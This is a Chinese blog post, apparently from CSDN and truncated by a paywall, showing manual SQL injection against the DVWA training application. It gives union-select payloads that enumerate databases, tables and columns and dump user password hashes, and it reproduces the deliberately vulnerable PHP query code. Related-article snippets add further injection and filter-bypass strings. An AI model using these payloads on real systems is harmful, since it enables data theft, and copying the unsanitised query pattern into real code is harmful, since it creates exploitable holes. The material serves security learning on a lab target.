DVWA 之 SQL Injection

最新推荐文章于 2025-04-06 23:07:18 发布
最新推荐文章于 2025-04-06 23:07:18 发布
阅读量283 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46665974/article/details/110394435
版权
本文详细探讨了DVWA中SQL Injection的LOW、Medium和High三个等级的漏洞利用,通过手工注入测试和源码分析揭示了不同等级的防御措施。在LOW等级,直接注入单引号触发错误,通过联合查询获取敏感信息。Medium等级,利用数字型注入绕过转义,同样获取数据。而High等级由于额外的防御函数和is_numeric()检查,使得直接注入变得困难。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

根据自己的知识积累进行手工注入测试,若有说的不恰当的地方,还望指正~

因为我发现不同版本的DVWA源码有一定程度上的不同,所以我会把源码在每题讲解后面贴出来,这样可以方便对应,我这里的版本是 v1.0.7
在这里插入图片描述

一、LOW等级
  • 输入框输入单引号’,报错
    在这里插入图片描述
    证明有SQL注入
  • ‘ union select 1,2 # 可以看哪些数据可以回显
    在这里插入图片描述
    如果跟能回显的数据量不一样,则报错
    在这里插入图片描述

在这里插入图片描述

  • 查看所有数据库名称,'union select 1,group_concat(schema_name) from information_schema.schemata #
    在这里插入图片描述

  • 查看当前数据库 ,’ union select 1,database() #
    在这里插入图片描述

  • 查看数据库dvwa下的表
    ’ union select 1,table_name from information_schema.tables where table_schema=“dvwa” #
    在这里插入图片描述

  • 查看users 表的字段 ’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users” #
    在这里插入图片描述

  • 查看users表里的user 和 password ,中间用~连起来 ’ union select 1,concat_ws(’~’,user,password) from dvwa.users #
    在这里插入图片描述
    这里不得不说,手工注入还是比不上sqlmap,如果是在sqlmap,这里显示的密码就不是hash值了,而是给我们爆破解出来的值了。

#LOW等级源码
<?php    

if(isset($_GET['Submit'])){
   
    
    // Retrieve data
    
    $id = $_GET['id'];

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );

    $num = mysql_numrows($result);

    $i = 0;
最低0.47元/天 解锁文章
DVWA系列 —— SQL injection(注入)
weixin_49340699的博客
12-14 725
SQL injection(注入)简介工具low,medium级别high级别impossible级别总结 简介 SQL注入就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql的目的 形成sql注入漏洞的原因: 1 用户输入不可控 2 输入内容被带入了SQL语句执行 通过SQL注入可以对程序对应的储存区进行对应的探测 工具 sqlmap brupsuite 环境 kali low,medium级别 第一步输入个1用brupsuite截断 在kali下使
【渗透测试】 sqlmap工具注入-基于dvwasql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1234
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA靶场进行SQL注入————(LOW)
最新发布
weixin_51334173的博客
04-06 2203
当Web应用程序未正确过滤用户输入,直接将输入拼接到SQL查询语句中时,攻击者可以构造恶意输入,篡改原始SQL逻辑,从而执行非预期的数据库操作(如窃取数据、删除表、绕过登录等)。
DVWASQL Injection
鸣蜩十四的博客
06-21 284
SQL Injection: 绕过空格(注释符/* */,%a0) 括号绕过空格 引号绕过(使用十六进制) %df%5c%27 逗号绕过(使用from或者offset) or and xor not绕过:and=&& or=|| xor=| not=! 绕过注释符号(#,--(后面跟一个空格))过滤:id=1' union select 1,2,3||'1 =绕过: 使用like 、rlike 、regexp 或者 使用< 或者 > 绕过union,select,wh...
dvwasql injection
Alsn86的博客
01-18 312
dvwasql injection low,php,没有任何过滤,把sql搜索到的所有记录都输出来 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $html .=$query;//自
DVWA靶场通关——SQL Injection
m0_74824865的博客
02-10 1062
该PHP代码的主要功能是根据用户提供的id参数,从数据库中查询对应的用户信息(包括first_name和last_name),并将查询结果显示给用户。该PHP代码段的主要功能是根据用户输入的id从数据库中查询用户的first_name和last_name,并将结果显示给用户。_POST数组中获取,但在传递给SQL查询之前,使用mysqli_real_escape_string函数对其进行了转义处理,从而减少了SQL注入的风险。它不仅简化了数据库操作,还提供了安全的机制来防止SQL注入和其他潜在的安全问题。
DVWA靶场SQL InjectionSQL注入)
m0_51150495的博客
06-08 1700
1.找到注入点;2.通过回显找到闭合方式;3.使用order by判断列数;4.使用union select判断显示位;5.使用union select爆出数据库名和版本号;6.已知数据库名后使用union select爆出表名和列名;7.最后爆出列名内所需信息,如user和password;8.此外还可使用union select来读取文件。1.输入1‘发现有如下闭合报错,则判断存在注入点,2.输入1''后出现回显,说明闭合为单引号'3. 判断列数,输入至1' order by 3#时出现报错,说明列数为
渗透测试学习2---DVWASQL Injection
正在学习的路上...
04-26 344
1.low PHP源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; ...
DVWA-----SQL Injection(SQL手工注入)
热门推荐
m0_65712192的博客
11-21 1万+
DVWA-----SQL Injection(SQL手工注入)
DVWA下的SQL Injection(Blind)
07-25
盲注
dvwaSQL Injection
kukudeshuo的博客
03-03 283
dvwaSQL Injection Security Level: low 由源代码可知,对字符串没有进行任何过滤 输入 1' and 1=1# 结果 ID: 1' and 1=1# First name: admin Surname: admin 输入 1' and 1=2# 结果为空白,说明存在SQL注入漏洞 判断字段数 1' order by 2# 结果: ID: 1' order by 2# First name: admin Surname: admin 1' order by 3
DVWASQL Injection
平凡
12-05 2044
圣人之道,吾性自足,不假外求
DVWA-SQL Injection
m0_49025459的博客
04-16 1835
LOW 判断注入是否存在 1' order by 2 # 1' order by 3 # 2的时候正常回显,但是3的时候报错,证明存在两个回显点,查询数据库 1' union select 1,database() # 查到数据库之后查询,查表名 1 union select 1,table_name from information_schema.tables where table_schema=database() # 两张表,先查表里的字段语句一样,改一下表.
dvwa-SQL Injection
Alter__的博客
05-16 776
是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name,
DVWA——SQL Injection
qq_41007744的博客
05-23 451
SQL InjectionLow&lt;?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE ...
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境...其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值